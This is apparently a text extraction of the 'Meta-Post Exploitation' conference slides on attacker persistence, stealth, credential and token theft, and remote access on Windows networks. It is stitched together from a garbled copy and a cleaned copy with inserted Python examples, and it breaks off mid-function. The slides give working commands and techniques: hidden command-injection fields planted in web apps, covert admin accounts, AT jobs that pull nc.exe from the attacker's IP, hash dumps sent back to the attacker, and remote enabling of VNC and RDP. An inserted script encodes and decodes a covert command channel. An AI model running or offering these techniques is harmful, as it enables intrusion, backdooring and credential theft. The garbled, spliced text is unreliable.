bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 8: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

• Existing Tools
  – L0phtCrack
    • Stores passwords in session files
  – Cain & Abel
    • Static table, difficult to export / use / automate
    • Password classification (NTLM, Cisco, SQL, md5)
  – Core Impact
    • Good for automated reuse of passwords against many hosts
    • No real storage / management capability
  – Text file / John the Ripper
    • Many people's method
    • Quick and dirty, not easily scalable

Slide 13

Slide 14

• MetaPass
• Demos
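The slides list what a password-management tool has to do (tie accounts to hosts, show which passwords are shared, prioritize cracking, grow the wordlist) but not how. The following is an added example, not the MetaPass tool from the talk: a minimal credential store on sqlite3 that does those four things for pwdump-format input. The host addresses and hash values are constructed placeholders, not real hashes of any password.

```python
"""Added example (not the talk's MetaPass): host/account/hash tracking with
cracked plaintexts shared across hosts and a prioritised crack queue."""
import sqlite3

EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NTLM of the empty password, not worth cracking

SAMPLE_DUMPS = {  # constructed pwdump output, format user:rid:lmhash:ntlmhash:::
    "10.0.0.5": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:1111111111111111aaaaaaaaaaaaaaaa:::",
        "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:2222222222222222bbbbbbbbbbbbbbbb:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ],
    "10.0.0.6": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:1111111111111111aaaaaaaaaaaaaaaa:::",
        "jsmith:1002:aad3b435b51404eeaad3b435b51404ee:3333333333333333cccccccccccccccc:::",
        "this line is garbage",  # malformed input must not abort a 1000-host run
    ],
}


class CredStore:
    def __init__(self, path=":memory:"):
        self.db = sqlite3.connect(path)
        self.db.executescript("""
            CREATE TABLE IF NOT EXISTS cred(
                host TEXT NOT NULL, account TEXT NOT NULL, rid INTEGER,
                lm TEXT, ntlm TEXT, PRIMARY KEY(host, account));
            CREATE TABLE IF NOT EXISTS cracked(
                ntlm TEXT PRIMARY KEY, plaintext TEXT NOT NULL);
        """)

    def ingest_pwdump(self, host, lines):
        """Store one host's pwdump lines; returns how many were usable."""
        n = 0
        for line in lines:
            parts = line.strip().split(":")
            if len(parts) < 4 or not parts[0]:
                continue
            rid = int(parts[1]) if parts[1].isdigit() else None
            self.db.execute("INSERT OR REPLACE INTO cred VALUES (?,?,?,?,?)",
                            (host, parts[0], rid, parts[2].lower(), parts[3].lower()))
            n += 1
        self.db.commit()
        return n

    def count(self):
        return self.db.execute("SELECT COUNT(*) FROM cred").fetchone()[0]

    def shared_hashes(self):
        """NTLM hashes present on more than one host -> [(host, account), ...]."""
        seen = {}
        for ntlm, host, account in self.db.execute(
                "SELECT ntlm, host, account FROM cred WHERE ntlm != ? ORDER BY host, account",
                (EMPTY_NTLM,)):
            seen.setdefault(ntlm, []).append((host, account))
        return {h: v for h, v in seen.items() if len({host for host, _ in v}) > 1}

    def record_crack(self, ntlm, plaintext):
        """One cracked hash is a cracked password on every host that shares it."""
        self.db.execute("INSERT OR REPLACE INTO cracked VALUES (?,?)", (ntlm.lower(), plaintext))
        self.db.commit()

    def hosts_for_password(self, plaintext):
        """Hosts where a recovered password is known to open some account."""
        rows = self.db.execute(
            "SELECT DISTINCT c.host FROM cred c JOIN cracked k ON c.ntlm = k.ntlm "
            "WHERE k.plaintext = ? ORDER BY c.host", (plaintext,))
        return [r[0] for r in rows]

    def uncracked(self):
        """Crack queue: hashes seen on the most hosts first, then RID 500, as (ntlm, hosts)."""
        rows = self.db.execute(
            "SELECT c.ntlm, COUNT(DISTINCT c.host) AS hosts "
            "FROM cred c LEFT JOIN cracked k ON c.ntlm = k.ntlm "
            "WHERE k.ntlm IS NULL AND c.ntlm != ? "
            "GROUP BY c.ntlm ORDER BY hosts DESC, (MIN(c.rid) = 500) DESC, c.ntlm",
            (EMPTY_NTLM,))
        return [(ntlm, hosts) for ntlm, hosts in rows]

    def wordlist(self):
        """Every recovered plaintext, for seeding the next cracking session."""
        return [r[0] for r in self.db.execute(
            "SELECT DISTINCT plaintext FROM cracked ORDER BY plaintext")]


def build_store():
    store = CredStore()
    for host, lines in SAMPLE_DUMPS.items():
        store.ingest_pwdump(host, lines)
    return store
```

Keyed by NTLM hash rather than by account, the store answers "what passwords are shared" before anything is cracked, and `uncracked()` puts the hash with the widest reach at the top of the queue.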

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

– In the old days a rootkit helped you maintain root
– Today rootkits are all about hiding
– These two concepts still go hand in hand

Slide 17

Persistence

• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1 shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness not always immediately known
• Goals: Access target as often as needed / useful
• Huge area of study
• Sometimes persistence doesn't matter

Slide 18

Persistence

• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: What tool to use?
    • FUZZY – OS, environment, target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: Don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace

Slide 19

Persistence

• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.

Slide 20

Persistence

• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject / add / modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in

Slide 21

Persistence

• Leveraging existing persistent admin access
  • Nagios checks
  • Attack configuration management
    – Cfengine
    – SMS
    – Automated patching systems ("patch" them with our trojans)
  • GUIs
  • Tool distribution

Slide 22

Persistence

• Example
  • Machine has VNC installed
  • Replace installed VNC with vulnerable version
    – Authentication bypass
  • Copy registry password so target doesn't realize
  • Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally

    <input type="hidden" name="Lang">

• Edit web app and tie vulnerable Perl code to the form field input

    if (defined $hidden_field) { open($filename, ">$hidden_field"); }

• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42, then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational ciphers (rot13, Caesar)
  – Even more complex obfuscation
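The trigger-and-stub channel of the last two slides, written out as an added example (this is not the talk's code): the request-side encoder, the decoder that would sit in the app, and the check a defender can run over submissions. The trigger values come from the slide; the stub marker "zq7", the field names and the log-line format are assumptions. The decoder returns the hidden command rather than executing it.

```python
"""Added example: trigger-field command channel (slides 26-27) from both sides."""
import codecs
import re
import urllib.parse

TRIGGER = {"Name": "John Smith", "Age": "42"}   # trigger combination from the slide
STUB = "zq7"            # hypothetical marker the decoder searches for
PAYLOAD_FIELD = "Address"


def encode_command(cmd):
    """Attacker side: rot13 the command, prefix the stub, URL-encode it for a field."""
    return urllib.parse.quote(STUB + codecs.encode(cmd, "rot_13"), safe="")


def build_form(cmd, **benign):
    """POST body that looks like an ordinary address form carrying the trigger values."""
    fields = dict(benign)
    fields.update(TRIGGER)
    fields[PAYLOAD_FIELD] = encode_command(cmd)
    return urllib.parse.urlencode(fields)


def decode_command(body):
    """App side ('the decoder'): None unless every trigger field matches; otherwise
    concatenate all field values, find the stub, rot13-decode the rest of that field."""
    fields = dict(urllib.parse.parse_qsl(body, keep_blank_values=True))
    if any(fields.get(k) != v for k, v in TRIGGER.items()):
        return None
    blob = "\n".join(urllib.parse.unquote(v) for v in fields.values())
    i = blob.find(STUB)
    if i < 0:
        return None
    return codecs.decode(blob[i + len(STUB):].split("\n", 1)[0], "rot_13")


# Defender side.  A rotational cipher costs nothing to reverse, so every field is
# examined both as submitted and after rot13; shell metacharacters or tool names
# in either form mark the submission.  Word-boundary matches can still false-positive
# on ordinary text, so treat a hit as something to look at, not proof.
SHELL_META = re.compile(r"[|;&`$<>]|\b(?:cmd|sh|nc|tftp|net|wget|curl)\b", re.I)


def suspicious_submissions(log_lines):
    """Constructed log format: 'client_ip METHOD path form_body' -> [(ip, path, field)]."""
    hits = []
    for line in log_lines:
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue
        ip, _method, path, body = parts
        for name, value in urllib.parse.parse_qsl(body, keep_blank_values=True):
            plain = urllib.parse.unquote(value)
            if SHELL_META.search(plain) or SHELL_META.search(codecs.decode(plain, "rot_13")):
                hits.append((ip, path, name))
                break
    return hits


SAMPLE_LOG = [  # constructed: one benign submission, one carrying a command
    "198.51.100.4 POST /cgi-bin/app.cgi " + urllib.parse.urlencode(
        {"Name": "Ann Lee", "Age": "31", "Address": "12 High St"}),
    "203.0.113.7 POST /cgi-bin/app.cgi " + build_form("tftp -i 10.0.0.9 GET nc.exe"),
]
```

Note what the defender check does not catch: the decoder only fires when the trigger combination is present, so a log scanner that ignores the benign-looking trigger fields and looks only for encoded payloads will still see the same request as a normal address-form submission unless it decodes every field.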

Slide 28

Persistence

• Covert Accounts
  – Add an account / re-enable
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
  – Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing

Slide 32

Stealth Evading Detection

• Why Stealth?
  – If you get caught you get stopped
  – The longer you can operate undetected the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth Evading Detection

• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis, anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth Evading Detection

• Using Windows security objects for stealth
  – Auditing of securable objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges, DKOM
  – su, sudo, ksu
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs. FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – Psexec was a great / awesome remote shell / command tool
  – Everybody now disables clipbook, which psexec requires: l4m3!
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
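Three independent settings decide whether the RDP logon from the procedure above will succeed: fDenyTSConnections refuses every connection regardless of rights, a deny logon right overrides the matching allow right, and the allow right has to name the account. The following is an added example, not part of the talk: a parser for the two files the slides build (the contents are the slides' own with a constructed account name, "svc_helpdesk") that reports which of the three will stop a given account. It does not resolve group membership, so an account that only gets the right via the Remote Desktop Users group is reported as lacking it.

```python
"""Added example: check the secedit template and .reg file for RDP access."""
import re

FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = svc_helpdesk
seinteractivelogonright = svc_helpdesk
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

ENABLE_TS_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

# Constructed "before" state: Remote Desktop switched off.
DEFAULT_TS_REG = ENABLE_TS_REG.replace('"fDenyTSConnections"=dword:00000000',
                                       '"fDenyTSConnections"=dword:00000001')

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def parse_privilege_rights(ini_text):
    """[Privilege Rights] of a secedit template: right -> [principal, ...].
    Exported templates prefix SIDs with '*', which is stripped; names are lowercased."""
    section, rights = None, {}
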